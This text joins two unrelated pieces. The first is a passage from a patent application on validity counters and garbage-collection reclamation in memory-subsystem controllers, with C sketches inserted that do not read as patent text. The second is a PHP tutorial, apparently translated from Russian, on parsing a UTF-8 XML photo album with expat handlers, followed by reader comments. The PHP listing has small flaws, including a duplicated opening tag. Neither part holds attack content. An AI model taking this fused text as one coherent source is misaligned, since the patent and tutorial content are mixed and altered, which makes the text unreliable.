At block 320, the processing device transfers the generated file (or data contained therein) to a component of the memory subsystem. For example, the computer system 120 transfers the generated file to the memory subsystem 110, which stores the transferred data in the controller memory 119 as the instructions/configuration data 118, which cause the controller 115 (or its components, such as the reclamation manager 113 or the processor 117) to track data validity as described herein. In some embodiments, the processing device transfers the generated file to a memory of the memory subsystem prior to the complete assembly of the memory subsystem.

As the controller 115 moves data within media or as the computer system 120 writes data to media, the controller 115 updates the counters in the validity map. For example, when the controller 115 writes a full block stripe of data to media, the controller 115 sets all of the counters associated with that block stripe to reflect that all of the TUs within the block stripe are valid. As data is moved or erased, the controller 115 reads the validity counter associated with the impacted TU(s) from the validity map 116 in the controller memory 119, increments or decrements the counter, and writes the updated counter back to the validity map 116.

Moving data within the media causes the media to become a patchwork of valid and invalid data. A reclamation process moves the valid data to a new location in memory so that the original location can be erased and made available for writing data. For example, the reclamation manager 113 may process block stripes of data. At a high level, the reclamation manager 113 identifies one or more "victim" block stripes that include invalid data and a target block stripe that is available for writing. The reclamation manager identifies valid data within the victim block stripe(s) based on the validity map 116 and moves the valid data to the target block stripe so the victim block stripe(s) can be erased.
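Before turning to the flow of FIG. 4, here is a minimal C sketch of the read-modify-write counter update described above, assuming multiplane-level tracking (four counters per block stripe, 16 TUs each); the struct layout and names are hypothetical, and a real map would pack the five-bit counters rather than use whole bytes.

    #include <stdint.h>

    #define GROUPS_PER_STRIPE 4u  /* multiplane-level tracking */

    /* Validity-map row for one block stripe: one count of valid TUs per
     * multiplane (0..16, so five bits per counter would suffice). */
    typedef struct {
        uint8_t valid_tus[GROUPS_PER_STRIPE];
    } stripe_validity;

    /* When a TU is moved, or its logical address is rewritten, its old
     * location goes stale and the new location becomes valid: read both
     * affected counters, adjust them, and write them back. */
    void on_tu_moved(stripe_validity *old_stripe, unsigned old_group,
                     stripe_validity *new_stripe, unsigned new_group)
    {
        old_stripe->valid_tus[old_group]--;  /* one fewer valid TU here */
        new_stripe->valid_tus[new_group]++;  /* one more valid TU there */
    }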
FIG. 4 is an exemplary block diagram of a reclamation process in accordance with some embodiments of the present disclosure. In such embodiments, the reclamation manager 113 is in communication with or includes one or more other components, including a logical-to-physical manager 405, a read-write (RW) manager 410, a media interface 415, and a lock manager 420. Each of these components may be part of the controller 115 (although not specifically illustrated in FIG. 1). The encircled letters "A" through "I" illustrate the overall flow of the reclamation process in this example.

At circle A, the reclamation manager 113 reads the validity map 116 to identify candidate block stripes for reclamation. In some embodiments, the reclamation manager 113 identifies victim block stripe(s) based on the validity counts stored within validity map 116 by, e.g., searching for the block stripe(s) with a count indicating a large number of invalid TUs. Once the reclamation manager 113 has identified a victim block stripe, it reads the validity count for some number of TUs within the victim block stripe. If the validity count indicates there are no valid TUs within the granularity represented by the validity count, the reclamation manager 113 does not need to move any of the data within that group of TUs. If the validity count indicates one or more valid TUs within the granularity represented by the validity count, the reclamation manager 113 determines which TU(s) within the group of units of data associated with the count contain valid data. If the validity count is at the TU level of granularity and the counter indicates the TU is valid (e.g., a '1'), the reclamation manager 113 proceeds to circle E. If the validity count is at a higher level of granularity than the TU, the counter value indicates the total number of TUs that include valid data but does not indicate which TUs include valid data and which TUs do not. In that case, the reclamation manager proceeds to circle B.

At circle B, the reclamation manager 113 issues a read to the media interface 415 to read the group of TUs associated with the validity count. For example, if the validity count is at the page level of granularity, the reclamation manager 113 issues a page read to the media interface 415 to read the page. The reclamation manager 113 determines the physical address associated with each TU based on its location within the media. For example, the reclamation manager 113 can determine the physical address of a TU based on its relative location within the block stripe being reclaimed, whose physical address is known. If a 64-TU block stripe for reclamation is located at a particular address in media, the location of each TU within the block stripe can be determined based on an address offset. For each TU within the group, the reclamation manager 113 extracts the logical address from the associated metadata and performs the operations described below with reference to circles C through I.

At circle C, the reclamation manager 113 requests from the logical-to-physical manager 405 the physical address associated with the logical address obtained from the TU metadata. If the logical-to-physical manager 405 has not cached a portion of the logical-to-physical address lookup table that includes the logical address from the TU metadata, the logical-to-physical manager 405 reads the appropriate portion of the logical-to-physical address lookup table via media interface 415, as indicated by circle D.
Once the logical-to-physical manager 405 returns the physical address associated with the logical address stored in the TU metadata, the reclamation manager compares that address with the physical address of the TU as determined from its location within the media as read at circle B. Matching physical addresses indicate the TU contains valid data (as the logical address translation still points to that physical location), while differing physical addresses indicate the TU contains invalid data.

At circle E, when the reclamation manager 113 has identified a valid TU, the reclamation manager 113 requests a lock of the TU from the lock manager 420 to prevent modifications to that TU until the reclamation process completes. At circle F, the reclamation manager 113 sends a command to the RW manager 410 to write (or queue for writing) the TU to the target block stripe. At circle G, the RW manager 410 sends a message to the logical-to-physical manager 405 to update the logical-to-physical address lookup table with the new physical address of the TU within the target block stripe. At circle H, the logical-to-physical manager 405 reads the valid counts associated with the old TU location (in the victim block stripe) and with the new TU location (in the target block stripe) from the validity map 116 in controller memory 119, decrements the valid count for the former and increments the valid count for the latter, and writes the valid counts back to the validity map 116. In some embodiments, these updates to the validity map may be queued until after the entire group of TUs associated with the read at circle B is complete (and the valid counts associated with the new and old locations updated by the number of TUs in the group). At circle I, the RW manager 410 writes the relocated TUs to the target block stripe and the lock manager 420 releases the lock on the TU(s).

In the above flow, the reclamation manager 113 need not consult a physical-to-logical address lookup table because the reclamation manager 113 was able to read the TUs associated with the validity count from media (circle B). In some cases, the granularity level may be too coarse (e.g., covering too many TUs), such that a read operation of all of the TUs (to obtain the metadata identifying their associated logical addresses) negatively impacts the performance of the reclamation manager 113. For example, if the validity map tracks validity at the block stripe level of granularity, performing a read of the entire block stripe may significantly impede other media operations (e.g., computer system 120 accesses). As such, in some embodiments employing validity count granularities at a certain level or lower, the physical-to-logical address lookup table may be omitted. In these cases, the controller 115 avoids provisioning space in the media (e.g., memory components 112A to 112N) for the physical-to-logical address lookup table, freeing media resources for other purposes.
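The address comparison performed at circles B through D reduces to a few lines once the pieces are in hand. Here is a minimal C sketch of the check, with a stub translation table; the metadata layout and every name here are assumptions for illustration, not the disclosure's implementation.

    #include <stdbool.h>
    #include <stdint.h>

    /* Metadata stored on media alongside each TU's user data. */
    typedef struct {
        uint32_t logical_addr;  /* logical address the TU was written for */
    } tu_metadata;

    uint32_t l2p[1024];  /* stub logical-to-physical table (bounds checks omitted) */

    /* A TU read out of a victim block stripe is valid only if the
     * translation table still points at the physical location it was read
     * from (stripe base + TU offset); otherwise a later write superseded
     * it and this copy is stale. */
    bool tu_is_valid(const tu_metadata *meta,
                     uint32_t stripe_base, uint32_t tu_offset)
    {
        uint32_t offset_pa = stripe_base + tu_offset;  /* where it was read */
        uint32_t table_pa  = l2p[meta->logical_addr];  /* where L2P points  */
        return table_pa == offset_pa;
    }

Each TU that passes the check is then locked, queued for the target block stripe, and has its table entry repointed, as circles E through I describe.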
FIG. 5 is a flow diagram of an example method to reclaim unused portions of memory in accordance with some embodiments of the present disclosure. The method 500 can be performed by processing logic that can include hardware (e.g., processing device, circuitry, dedicated logic, programmable logic, microcode, hardware of a device, integrated circuit, etc.), software (e.g., instructions run or executed on a processing device), or a combination thereof. In some embodiments, the method 500 is performed by the reclamation manager component 113 of FIG. 1. Although shown in a particular sequence or order, unless otherwise specified, the order of the processes can be modified. Thus, the illustrated embodiments should be understood only as examples, and the illustrated processes can be performed in a different order, and some processes can be performed in parallel. Additionally, one or more processes can be omitted in various embodiments. Thus, not all processes are required in every embodiment. Other process flows are possible.

Having identified one or more folding victims and a folding target, at block 505, the processing device reads a validity count from a validity map associated with one of the victims (e.g., a block stripe). The validity count represents the validity of a group of units of data at a granularity based on the configuration of, or the instructions executed by, the memory subsystem 110 from the instructions/configuration data 118. For example, if the victim is a block stripe that contains four multiplanes and the validity map granularity is at the multiplane level, the count represents the number of valid TUs within the multiplane.

At block 510, the processing device reads the group of units of data associated with the validity count from media. The read data includes the metadata that identifies the logical address of each TU within the group. For example, if the validity count is at the multiplane level, the group includes 16 TUs, each having metadata identifying its corresponding logical address. Note that the processing device can determine the physical address of each TU in the group based on its relative location within the victim block stripe (e.g., based on an offset relative to the block stripe's physical address).

At block 515, the processing device obtains another physical address of the unit of data from a logical-to-physical address lookup. This second physical address is based on a lookup of the logical address stored in the metadata associated with the unit of data in the logical-to-physical address translation table.

At block 520, the processing device determines whether a unit has valid data. To do so, the processing device compares the offset-based physical address of the unit of data (e.g., from the unit of data's position within the victim block stripe) to the physical address from the logical-to-physical lookup (e.g., from the address translation table). Because writes to a logical address are written to a new location in memory (with a corresponding update to the logical-to-physical address translation table) rather than overwriting the existing data in memory, if the offset-based physical address does not match the lookup-based physical address, the unit of data is no longer valid.

At block 525, the processing device writes each unit determined to have valid data to a new location within the target block stripe and updates a logical-to-physical address table for each rewritten unit by writing the new physical address of the unit within the target block stripe to the corresponding logical address position within the table. Once all of the valid data in the victim block stripe has been moved, the block stripe can be erased. At block 530, the processing device updates the validity map by incrementing and/or decrementing validity counts associated with the TUs in the victim and target block stripe(s).
For example, if the validity map includes counters tracking validity at the multiplane level and four valid TUs were relocated from a multiplane in the victim block stripe to a multiplane in the target block stripe, the processing device decrements the counter associated with the multiplane in the victim block stripe and increments the counter associated with the multiplane in the target block stripe. The incrementing or decrementing may occur after each move of the smallest granularity of data (e.g., by -/+1 each time a TU is moved), when all of the units of data within the counter granularity have been moved (e.g., -/+X, where X is between 1 and the number of units of data within a counter granularity), or in some other manner. In some embodiments, the processing device moves all valid data within the victim block stripe and resets all of the corresponding validity counters (without decrementing) when the block stripe is erased.

FIG. 6 illustrates an example machine of a computer system 600 within which a set of instructions, for causing the machine to perform any one or more of the methodologies discussed herein, can be executed. In some embodiments, the computer system 600 can correspond to a computer system (e.g., the computer system 120 of FIG. 1) that includes, is coupled to, or utilizes a memory subsystem (e.g., the memory subsystem 110 of FIG. 1) or can be used to perform the operations of a controller (e.g., to execute an operating system to perform operations corresponding to the reclamation manager component 113 of FIG. 1). In alternative embodiments, the machine can be connected (e.g., networked) to other machines in a LAN, an intranet, an extranet, and/or the Internet. The machine can operate in the capacity of a server or a client machine in a client-server network environment, as a peer machine in a peer-to-peer (or distributed) network environment, or as a server or a client machine in a cloud computing infrastructure or environment.

The machine can be a personal computer (PC), a tablet PC, a set-top box (STB), a Personal Digital Assistant (PDA), a cellular telephone, a web appliance, a server, a network router, a switch or bridge, or any machine capable of executing a set of instructions (sequential or otherwise) that specify actions to be taken by that machine. Further, while a single machine is illustrated, the term "machine" shall also be taken to include any collection of machines that individually or jointly execute a set (or multiple sets) of instructions to perform any one or more of the methodologies discussed herein.

The example computer system 600 includes a processing device 602, a main memory 604 (e.g., read-only memory (ROM), flash memory, dynamic random access memory (DRAM) such as synchronous DRAM (SDRAM) or Rambus DRAM (RDRAM), etc.), a static memory 606 (e.g., flash memory, static random access memory (SRAM), etc.), and a data storage system 618, which communicate with each other via a bus 630. Processing device 602 represents one or more general-purpose processing devices such as a microprocessor, a central processing unit, or the like. More particularly, the processing device can be a complex instruction set computing (CISC) microprocessor, reduced instruction set computing (RISC) microprocessor, very long instruction word (VLIW) microprocessor, or a processor implementing other instruction sets, or processors implementing a combination of instruction sets.
Processing device 602 can also be one or more special-purpose processing devices such as an application specific integrated circuit (ASIC), a field programmable gate array (FPGA), a digital signal processor (DSP), network processor, or the like. The processing device 602 is configured to execute instructions 626 for performing the operations and steps discussed herein. The computer system 600 can further include a network interface device 608 to communicate over the network 620. The data storage system 618 can include a machine-readable storage medium 624 (also known as a computer-readable medium) on which is stored one or more sets of instructions 626 or software embodying any one or more of the methodologies or functions described herein. The instructions 626 can also reside, completely or at least partially, within the main memory 604 and/or within the processing device 602 during execution thereof by the computer system 600, the main memory 604 and the processing device 602 also constituting machine-readable storage media. The machine-readable storage medium 624, data storage system 618, and/or main memory 604 can correspond to the memory subsystem 110 of FIG. 1. In one embodiment, the instructions 626 include instructions to implement functionality corresponding to a reclamation manager component (e.g., the reclamation manager component 113 of FIG. 1). While the machine-readable storage medium 624 is shown in an example embodiment to be a single medium, the term “machine-readable storage medium” should be taken to include a single medium or multiple media that store the one or more sets of instructions. The term “machine-readable storage medium” shall also be taken to include any medium that is capable of storing or encoding a set of instructions for execution by the machine and that cause the machine to perform any one or more of the methodologies of the present disclosure. The term “machine-readable storage medium” shall accordingly be taken to include, but not be limited to, solid-state memories, optical media, and magnetic media. Some portions of the preceding detailed descriptions have been presented in terms of algorithms and symbolic representations of operations on data bits within a computer memory. These algorithmic descriptions and representations are the ways used by those skilled in the data processing arts to most effectively convey the substance of their work to others skilled in the art. An algorithm is here, and generally, conceived to be a self-consistent sequence of operations leading to a desired result. The operations are those requiring physical manipulations of physical quantities. Usually, though not necessarily, these quantities take the form of electrical or magnetic signals capable of being stored, combined, compared, and otherwise manipulated. It has proven convenient at times, principally for reasons of common usage, to refer to these signals as bits, values, elements, symbols, characters, terms, numbers, or the like. It should be borne in mind, however, that all of these and similar terms are to be associated with the appropriate physical quantities and are merely convenient labels applied to these quantities. 
The present disclosure can refer to the action and processes of a computer system, or similar electronic computing device, that manipulates and transforms data represented as physical (electronic) quantities within the computer system's registers and memories into other data similarly represented as physical quantities within the computer system memories or registers or other such information storage systems. The present disclosure also relates to an apparatus for performing the operations herein. This apparatus can be specially constructed for the intended purposes, or it can include a general-purpose computer selectively activated or reconfigured by a computer program stored in the computer. For example, a computer system or other data processing system, such as the controller 115, may carry out the computer-implemented method 500 in response to its processor executing a computer program (e.g., a sequence of instructions) contained in a memory or other non-transitory machine-readable storage medium. As another example, a computer system or other data processing system, such as the processor 121, may carry out the computer-implemented method 300 in response to its processor executing a computer program (e.g., a sequence of instructions) contained in a memory or other non-transitory machine-readable storage medium. Such a computer program can be stored in a computer readable storage medium, such as, but not limited to, any type of disk including floppy disks, optical disks, CD-ROMs, and magnetic-optical disks, read-only memories (ROMs), random access memories (RAMs), EPROMs, EEPROMs, magnetic or optical cards, or any type of media suitable for storing electronic instructions, each coupled to a computer system bus. The algorithms and displays presented herein are not inherently related to any particular computer or other apparatus. Various general-purpose systems can be used with programs in accordance with the teachings herein, or it can prove convenient to construct a more specialized apparatus to perform the method. The structure for a variety of these systems will appear as set forth in the description below. In addition, the present disclosure is not described with reference to any particular programming language. It will be appreciated that a variety of programming languages can be used to implement the teachings of the disclosure as described herein. The present disclosure can be provided as a computer program product, or software, that can include a machine-readable medium having stored thereon instructions, which can be used to program a computer system (or other electronic devices) to perform a process according to the present disclosure. A machine-readable medium includes any mechanism for storing information in a form readable by a machine (e.g., a computer). In some embodiments, a machine-readable (e.g., computer-readable) medium includes a machine (e.g., a computer) readable storage medium such as a read only memory (“ROM”), random access memory (“RAM”), magnetic disk storage media, optical storage media, flash memory components, etc. In the foregoing specification, embodiments of the disclosure have been described with reference to specific example embodiments thereof. It will be evident that various modifications can be made thereto without departing from the broader spirit and scope of embodiments of the disclosure as set forth in the following claims. The specification and drawings are, accordingly, to be regarded in an illustrative sense rather than a restrictive sense. 
Claims

1. A method comprising: reading, by a computer device, an indicator from a configuration file, the indicator identifying a granularity of units of data at which to track validity, wherein the granularity is one of a plurality of granularities ranging from one unit of data to many units of data; generating, by the computer device, a machine-readable file configured to cause a processing device of a memory system to track validity at the identified granularity using a plurality of data validity counters, each data validity counter in the plurality of data validity counters tracking validity of a group of units of data at the identified granularity; and transferring the machine-readable file from the computer device to a memory of the memory system.

2. The method of claim 1, wherein if the granularity identifies a first granularity from the plurality of granularities, the machine-readable file is further configured to cause the processing device to provision space in a non-volatile memory array for a logical-to-physical address translation table and a physical-to-logical address translation table.

3. The method of claim 1, wherein if the granularity identifies a second granularity from the plurality of granularities, the machine-readable file is further configured to cause the processing device to provision space in a non-volatile memory array for a logical-to-physical address translation table and excludes a physical-to-logical address translation table.

4. The method of claim 1, wherein the machine-readable file is further configured to cause the processing device to provision space in a volatile memory for a validity table, the validity table storing a value of each validity counter in the plurality of data validity counters.

5. The method of claim 4, wherein the machine-readable file is further configured to cause the processing device to update a first value of a first validity counter in the validity table when a first unit of data within the group of units of data tracked by the first validity counter is flagged as stale.

6. The method of claim 4, wherein the machine-readable file is further configured to cause the processing device to reclaim a portion of a non-volatile memory array based in part on the validity table.

7. The method of claim 6, wherein to reclaim the portion of the non-volatile memory array comprises: reading a value of a first validity counter in the plurality of validity counters from the validity table, the first validity counter tracking validity of a first group of units of data at the identified granularity; if the value of the first validity counter is not equal to zero or to a total number of units of data of the identified granularity: reading metadata associated with the first group of units of data; determining a first physical address of a first unit of data within the first group of units of data from a logical-to-physical address lookup based on a logical address of the first unit of data stored within the metadata; determining a second physical address of the first unit of data within the first group of units of data based on a location of the first unit of data within the first group of units of data; and if the first physical address matches the second physical address, moving the first unit of data in the non-volatile memory array.

8.
A non-transitory computer-readable storage medium comprising instructions that, when executed by a computer device, cause the computer device to: read an indicator from a configuration file, the indicator identifying a granularity of units of data at which to track validity, wherein the granularity is one of a plurality of granularities ranging from one unit of data to many units of data; generate a machine-readable file configured to cause a processing device of a memory system to track validity at the identified granularity using a plurality of data validity counters, each data validity counter in the plurality of data validity counters to track validity of a group of units of data at the identified granularity; and transfer the machine-readable file to a memory of the memory system.

9. The non-transitory computer-readable medium of claim 8, wherein if the granularity identifies a first granularity from the plurality of granularities, the machine-readable file is further configured to cause the processing device to provision space in a non-volatile memory array for a logical-to-physical address translation table and a physical-to-logical address translation table.

10. The non-transitory computer-readable medium of claim 8, wherein if the granularity identifies a second granularity from the plurality of granularities, the machine-readable file is further configured to cause the processing device to provision space in a non-volatile memory array for a logical-to-physical address translation table and excludes a physical-to-logical address translation table.

11. The non-transitory computer-readable medium of claim 8, wherein the machine-readable file is further configured to cause the processing device to provision space in a volatile memory for a validity table, the validity table to store a value of each validity counter in the plurality of data validity counters.

12. The non-transitory computer-readable medium of claim 11, wherein the machine-readable file is further configured to cause the processing device to update a first value of a first validity counter in the validity table when a first unit of data within the group of units of data tracked by the first validity counter is flagged as stale.

13. The non-transitory computer-readable medium of claim 11, wherein the machine-readable file is further configured to cause the processing device to reclaim a portion of a non-volatile memory array based in part on the validity table.

14.
The non-transitory computer-readable medium of claim 13, wherein to reclaim a portion of the non-volatile memory array, the processing device is to: read a value of a first validity counter in the plurality of validity counters from the validity table, the first validity counter to track validity of a first group of units of data at the identified granularity; if the value of the first validity counter is not equal to zero or to a total number of units of data of the identified granularity: read metadata associated with the first group of units of data; determine a first physical address of a first unit of data within the first group of units of data from a logical-to-physical address lookup based on a logical address of the first unit of data stored within the metadata; determine a second physical address of the first unit of data within the first group of units of data based on a location of the first unit of data within the first group of units of data; and if the first physical address matches the second physical address, move the first unit of data in the non-volatile memory array.

15. A system comprising: a processing device of a memory subsystem; and a computer device, operatively coupled with the processing device, to: read an indicator from a configuration file, the indicator identifying a granularity of units of data at which to track validity, wherein the granularity is one of a plurality of granularities ranging from one unit of data to many units of data; generate a machine-readable file configured to cause a processing device of a memory system to track validity at the identified granularity using a plurality of data validity counters, each data validity counter in the plurality of data validity counters to track validity of a group of units of data at the identified granularity; and transfer the machine-readable file to a memory of the memory system.

16. The system of claim 15, wherein if the granularity identifies a first granularity from the plurality of granularities, the machine-readable file is further configured to cause the processing device to provision space in a non-volatile memory array for a logical-to-physical address translation table and a physical-to-logical address translation table.

17. The system of claim 15, wherein if the granularity identifies a second granularity from the plurality of granularities, the machine-readable file is further configured to cause the processing device to provision space in a non-volatile memory array for a logical-to-physical address translation table and excludes a physical-to-logical address translation table.

18. The system of claim 15, wherein the machine-readable file is further configured to cause the processing device to provision space in a volatile memory for a validity table, the validity table to store a value of each validity counter in the plurality of data validity counters.

19. The system of claim 18, wherein the machine-readable file is further configured to cause the processing device to update a first value of a first validity counter in the validity table when a first unit of data within the group of units of data tracked by the first validity counter is flagged as stale.

20. The system of claim 18, wherein the machine-readable file is further configured to cause the processing device to reclaim a portion of a non-volatile memory array based in part on the validity table.
Patent History

Publication number: 20200050556
Type: Application
Filed: Aug 10, 2018
Publication Date: Feb 13, 2020
Patent Grant number: 10795828
Inventors: Boon Leong Yeap (Broomfield, CA), Karl D. Schuh (Santa Cruz, CA)
Application Number: 16/101,288

Classifications

International Classification: G06F 12/14 (20060101); G06F 3/06 (20060101); G06F 12/02 (20060101); G06F 17/30 (20060101)
Using XML in PHP

As you have probably already guessed from the title, this article is about how XML can be used to store data that will be consumed by scripts written in PHP. We will assume that you already know what XML is and what it is good for. The examples for the article are available for download.

The plan is as follows. First we will find out which functions PHP offers for working with XML and how to use them. To understand this better, we will walk through a small script that displays the structure of an XML document. Let's get started.

Rather than drone on with generalities about working with XML in PHP, let's take it all apart with an example. So, the task: write a script that shows the structure of an XML document. In the examples this is the file xml.php.

First we create an XML document (test.xml in the examples). Let this file describe photographs. We will not get fancy, and we will do without a DTD (not to be confused with DDT :)).

Here the first unpleasant quirk of PHP appears: XML documents that are to be processed from a script may be written only in the following encodings: US-ASCII, ISO-8859-1, and UTF-8. Since we need to describe the photographs in Russian, we have to choose the last one, because the first two contain no Russian letters. Not every text editor can work with this encoding. I, for example, typed the XML in the SciTE editor. It is small, free, and has good syntax highlighting (including for PHP and XML). Our XML document will look like this:

    <?xml version="1.0" encoding="UTF-8"?>
    <album>
        <foto smallfoto="Fotos/1smallvelo.jpg" bigfoto="Fotos/1bigvelo.jpg">
            <title>Название 1</title>
            <comment>Длинный комментарий
                на несколько строк 1</comment>
            <date>26.05.2003</date>
            <color/>
            <detailed>0</detailed>
        </foto>
        <foto smallfoto="Fotos/smallbardak.jpg" bigfoto="Fotos/bigbardak.jpg">
            <title>Название 2</title>
            <comment>Длинный комментарий
                на несколько строк 2</comment>
            <date>27.05.2003</date>
            <color/>
            <detailed>1</detailed>
        </foto>
    </album>

The "physical" meaning of the XML tags does not matter right now (although it is all fairly self-explanatory anyway). The only note is that <color/> might indicate whether or not the photo is in color; it is here purely as an example of a tag that has no closing counterpart.

Now let's write the script that displays the structure of the XML document. PHP has more than 20 functions for working with XML; to start, we will look at the most essential ones. Here is the script:

    <?
<?
    $xmlfilename = "test.xml";
    $code = "UTF-8";               // Encoding of the XML file
    $curcode = "Windows-1251";     // Current output encoding
    $level = 0;                    // Nesting level
    $list = array();               // List of elements in the XML file

    // Converts a string from Unicode
    function encoding ($str)
    {
        global $code;
        global $curcode;
        $str = mb_convert_encoding($str, $curcode, $code);
        return $str;
    }

    function drawspace()
    {
        global $level;
        for ($i = 0; $i < $level * 10; $i++)
        {
            echo " ";
        }
    }

    // Handles the text between tags
    function characterhandler ($parser, $data)
    {
        global $code;
        global $curcode;
        drawspace();
        $data = encoding($data, $curcode, $code);
        $data = trim($data)."<br>";
        echo $data;
    }

    // Handles opening tags
    function starthandler ($parser, $name, $attribs)
    {
        global $level;
        global $list;
        global $code;
        global $curcode;
        $name = encoding($name, $curcode, $code);
        $list[] = $name;
        drawspace();
        echo "<font color='blue' size='+1'>$name</font>";
        foreach ($attribs as $atname => $val)
        {
            echo encoding("$atname => $val");
        }
        echo "><br>";
        $level++;
    }

    // Handles closing tags
    function endhandler ($parser, $name)
    {
        global $level;
        global $list;
        array_pop($list);
        $level--;
        drawspace();
        echo "<font color='blue' size='+1'>/$name</font><p>";
    }

    // Create the parser
    $parser = xml_parser_create($code);
    if (!$parser)
    {
        exit ("Could not create parser");
    }
    else
    {
        echo "Parser created successfully<p>";
    }

    // Set the handlers for tags and for the text between them
    xml_set_element_handler($parser, 'starthandler', 'endhandler');
    xml_set_character_data_handler($parser, 'characterhandler');

    // Open the XML file
    $fp = fopen ($xmlfilename, "r");
    if (!$fp)
    {
        xml_parser_free($parser);
        exit("Could not open file");
    }

    while ($data = fread($fp, 4096))
    {
        if (!xml_parse($parser, $data, feof($fp)))
        {
            die(sprintf("Something went wrong: %s at line %d",
                xml_error_string(xml_get_error_code($parser)),
                xml_get_current_line_number($parser)));
        }
    }
    fclose ($fp);
    xml_parser_free($parser);
?>

After the helper function declarations, the first thing we must do is create the parser. This can be done with one of two functions: xml_parser_create or xml_parser_create_ns. The first takes a single optional parameter indicating the encoding the XML document is written in. If it is omitted, the document is assumed to be in ISO-8859-1, which, as I wrote above, does not suit us, so we choose UTF-8. Since we will need the name of this encoding again, we put it in a global variable ($code = "UTF-8";), and we do the same with the encoding in which text will be sent to the browser ($curcode = "Windows-1251";). The function xml_parser_create_ns takes an additional (also optional) parameter: the character that separates namespaces in the document.
Since we don't need namespaces right now, we used the first function. If the parser is created successfully, the variable $parser gets a non-zero value. After that, we have to tell the XML parser which functions to call when XML tags appear in the text. In our example this is done like so:

    // Set the handlers for tags and for the text between them
    xml_set_element_handler($parser, 'starthandler', 'endhandler');
    xml_set_character_data_handler($parser, 'characterhandler');

The function xml_set_element_handler installs the handlers for opening and closing tags. Its first parameter is the parser we created earlier; the second and third are the names of the functions to be called as opening and closing tags are encountered, respectively. These functions must be declared in a specific way. The opening-tag handler should look roughly like this:

    // Handles opening tags
    function starthandler ($parser, $name, $attribs)
    {
    }

When it is called, it is passed the parser we created, the name of the tag being processed, and its attributes (whatever appears inside the angle brackets after the name). The name needs no special treatment, while the attributes arrive as an associative array, i.e. as key => value pairs. That is why we process them like this:

    foreach ($attribs as $atname => $val)
    {
        echo encoding("$atname => $val");
    }

The same goes for closing tags, except that the handler receives no attributes, which a closing tag cannot have anyway:

    function endhandler ($parser, $name)
    {
    }

There is one interesting detail here. Even if a tag has no closing counterpart, the second handler is still called. If you look at the script's output, you will see that for the <color/> tag we got:

<COLOR>
</COLOR>

To process the text located between tags, you install the corresponding handler with xml_set_character_data_handler. It is used in exactly the same way, except that its second argument must be the name of a function declared as:

    function characterhandler ($parser, $data)

That is, the same shape as the closing-tag handler. This is the function that receives all the data such as "Название 1" or "Длинный комментарий на несколько строк 2" from our example.

And finally, the main question: how do we read the XML document? It turns out to be simple: like an ordinary text file. That is, we open it with fopen, for example:

    $fp = fopen ($xmlfilename, "r");

and read all the data from it, passing each chunk to the xml_parse function:

    while ($data = fread($fp, 4096))
    {
        if (!xml_parse($parser, $data, feof($fp)))
        {
            die(sprintf("Something went wrong: %s at line %d",
                xml_error_string(xml_get_error_code($parser)),
                xml_get_current_line_number($parser)));
        }
    }

xml_parse takes three arguments. The first is the parser variable we created earlier, the second is the chunk of data that was read, and the third (optional) is a flag saying it is time to finish parsing (which is why we pass in whether the end of the file has been reached). We have also added error checking, which is fairly self-explanatory: xml_get_error_code returns an error code, from which xml_error_string builds a string describing the error.

After all this, don't forget to destroy the parser. This is done with xml_parser_free:

    xml_parser_free($parser);

Now for one of the most unpleasant quirks. Since we wrote the XML as Unicode, the strings are handed to us in that same encoding.
And since a site is usually built in a more familiar encoding (KOI8, Windows-1251), something has to be done with this Unicode. This is where the really unpleasant part begins. The PHP extension responsible for XML has two functions for recoding UTF-8: utf8_decode, which converts a string from UTF-8, and utf8_encode, which converts to UTF-8. But they do not suit us, because they only work with the ISO-8859-1 encoding, which has no Cyrillic letters. Fortunately, the PHP developers did provide a function that works fine with other encodings as well: mb_convert_encoding. In our case we used it like this:

    $str = mb_convert_encoding($str, $curcode, $code);

$curcode and $code are the variables holding the names of the encodings (remember, we declared them global earlier). The function is straightforward: the first argument is the source string, the second is the name of the encoding to convert to, and the third (optional) argument is the encoding to convert from. The function returns the new string.

It would seem that all is well: the function exists and works great (it really does). But for it to work, the mbstring (multi-byte string) extension must be enabled in PHP. On Windows this means uncommenting the line extension=php_mbstring.dll in php.ini. While that is easy to do at home, the extension may well not be enabled on the hosting where your site lives. That is exactly why I moved the re-encoding into a separate function, so that it can easily be changed:

    // Converts a string from Unicode
    function encoding ($str)
    {
        global $code;
        global $curcode;
        $str = mb_convert_encoding($str, $curcode, $code);
        return $str;
    }
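If mbstring turns out to be unavailable on your host, the iconv extension is a commonly available alternative. The following is not from the original article, just a sketch of a drop-in replacement, assuming iconv is compiled into your PHP build (typical, but not guaranteed):

    // Converts a string from Unicode (iconv variant)
    function encoding ($str)
    {
        global $code;
        global $curcode;
        $converted = iconv($code, $curcode, $str);           // from $code to $curcode
        return ($converted === false) ? $str : $converted;   // fall back to the raw string on failure
    }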
Those were the simplest functions for working with XML. To make things a little more interesting, the script also counts the nesting level of the tags (so that the text can be indented by the right amount), and every opening tag is appended to the global variable $list, with the last element popped off when a closing tag appears. As a result, $list holds the path we took to reach the current tag, and the tag itself sits at the end of the list.

Now let's play around a little and see how the error handling works. Remove the slash from the color tag, leaving <color>, as if we had forgotten to close it. Here is what PHP reports: "Something went wrong: mismatched tag at line 16". Processing stops at that point. You also get a "mismatched tag" error if you move the closing tag </date> after the closing tag </foto>.

Let's play with encodings too. If you save our XML document in Windows-1251 and honestly declare that in the header as <?xml version="1.0" encoding="Windows-1251"?> (don't forget to fix the corresponding global variable in the script), then PHP... simply crashes :) At least that is what happened for me. I tested this script on the following configuration: Win2000 + SP3; Apache 1.3.27; PHP 4.3.1.

That is about all for now.

Comments

h11od-ALeX (20.06.2012): Thanks, this helped a lot! :)

anaconda (24.10.2007): Cool manual, kudos to the author for the RTFM! :)

NA (30.05.2008): A very interesting article! Could you recommend something for beginners about displaying data from an XML document on a web page when searching through the document? We are scientists building a site for archives that have been marked up in XML, and hiring specialists to build the search engine is very expensive. Is there anything out there that ordinary scientists can grasp?

Jenyay (30.05.2008): To NA: I can't name a specific article, but have a look at XPath. I'm sure there are good articles on the topic online (although I learned XPath from MSDN myself).

Дмитрий (06.11.2008): It doesn't work. I made the two files exactly as in the example and it doesn't work; all I see is "Parser created successfully". Can you tell me what's wrong?

Jenyay (06.11.2008): I'll try to take a look in the near future. I wrote this article so long ago that I no longer remember myself what I did here :)

Jenyay (12.11.2008): Дмитрий, sorry for the slow reply. I tried different scenarios but never managed to get nothing printed after the message about the successfully created parser; I always get either an error or the output.

Ricken (31.10.2009): Thank you! I couldn't find a solution for encodings in PHP+XML until I stumbled on your article. The mb_convert_encoding() function solved the problem. Thanks again!
